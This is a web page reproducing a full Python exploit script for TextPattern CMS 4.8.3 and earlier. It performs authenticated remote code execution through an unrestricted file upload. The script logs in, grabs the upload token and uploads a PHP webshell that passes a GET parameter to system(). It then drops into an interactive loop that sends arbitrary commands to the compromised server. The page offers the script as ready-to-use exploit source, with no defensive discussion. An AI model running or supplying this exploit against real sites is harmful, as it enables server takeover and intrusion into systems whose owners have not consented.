textpattern cms 4.8.3 remote code execution (authenticated)

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textpattern cms 4.8.3 remote code execution (authenticated) Code Code...
#!/usr/bin/python3 # Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload # Google Dork: N/A # Date: 16/10/2020 # Exploit Author: Michele '0blio_' Cisternino # Vendor Homepage: https://textpattern.com/ # Software Link: https://github.com/textpattern/textpattern # Version: <= 4.8.3 # Tested on: Kali Linux x64 # CVE: N/A import sys import json import requests from bs4 import BeautifulSoup as bs4 from time import sleep import random import string import readline # Disable SSL warnings requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Simple Terminal User Interface class I wrote to print run-time logs and headers class Tui (): def __init__ (self): self.red = '\033[91m' self.green = '\033[92m' self.blue = '\033[94m' self.yellow = '\033[93m' self.pink = '\033[95m' self.end = '\033[0m' self.bold = '\033[1m' def header (self, software, author, cve='N/A'): print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='') print ("{}CVE:{} {}".format(self.pink, self.end, cve)) print ("{}Author:{} {}\n".format(self.pink, self.end, author)) def info (self, message): print ("[{}*{}] {}".format(self.blue, self.end, message)) def greatInfo (self, message): print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end)) def success (self, message): print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end)) def warning (self, message): print ("[{}!{}] {}".format(self.yellow, self.end, message)) def error (self, message): print ("[{}✗{}] {}".format(self.red, self.end, message)) log = Tui() log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino") if len(sys.argv) < 4: log.info ("USAGE: python3 exploit.py http://target.com username password") log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n") sys.exit() # Get input from the command line target, username, password = sys.argv[1:4] # Fixing URL target = target.strip() if not target.startswith("https://") and not target.startswith("http://"): target = "http://" + target if not target.endswith("/"): target = target + "/" accessData = {'p_userid':username, 'p_password':password, '_txp_token':""} # Login log.info ("Authenticating to the target as '{}'".format(username)) s = requests.Session() try: r = s.post(target + "textpattern/index.php", data=accessData, verify=False) sleep(1) if r.status_code == 200: log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public'])) sleep(1) # Parsing the response to find the upload token inside the main json array log.info ("Grabbing _txp_token (required to proceed with exploitation)..") soup = bs4(r.text, 'html.parser') scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2] scriptJS = json.loads(scriptJS) uploadToken = scriptJS['_txp_token'] log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken)) # The server reply with a 401 with the user provide wrong creds as input elif r.status_code == 401: log.error ("Unable to login. You provided wrong credentials..\n") sys.exit() except requests.exceptions.ConnectionError: log.error ("Unable to connect to the target!") sys.exit() # Crafting the upload request here headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", "Accept-Encoding" : "gzip, deflate", "X-Requested-With" : "XMLHttpRequest", "Connection" : "close", } # Generating random webshell name randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php' # Mapping multiparts here multipart_form_data = { "fileInputOrder" : (None, '1/1'), "app_mode" : (None, 'async'), "MAX_FILE_SIZE" : (None, '2000000'), "event" : (None, 'file'), "step" : (None, 'file_insert'), "id" : (None, ' '), "_txp_token" : (None, uploadToken), # Token here "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol } # Uploading the webshell log.warning ("Sending payload..") try: r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data) if "Files uploaded" in r.text: log.success ("Webshell uploaded successfully as {}".format(randomFilename)) except: log.error ("Unexpected error..") sys.exit() sleep(2) # Interact with the webshell (using the readline library to save the history of the executed commands at run-time) log.greatInfo ("Interacting with the HTTP webshell..") sleep (1) print() while 1: try: cmd = input ("\033[4m\033[91mwebshell\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False) print (r.text) except KeyboardInterrupt: log.warning ("Stopped.") exit() except: log.error ("Unexpected error..") sys.exit() print()

Textpattern cms 4.8.3 remote code execution (authenticated) Vulnerability / Exploit Source : Textpattern cms 4.8.3 remote code execution (authenticated)

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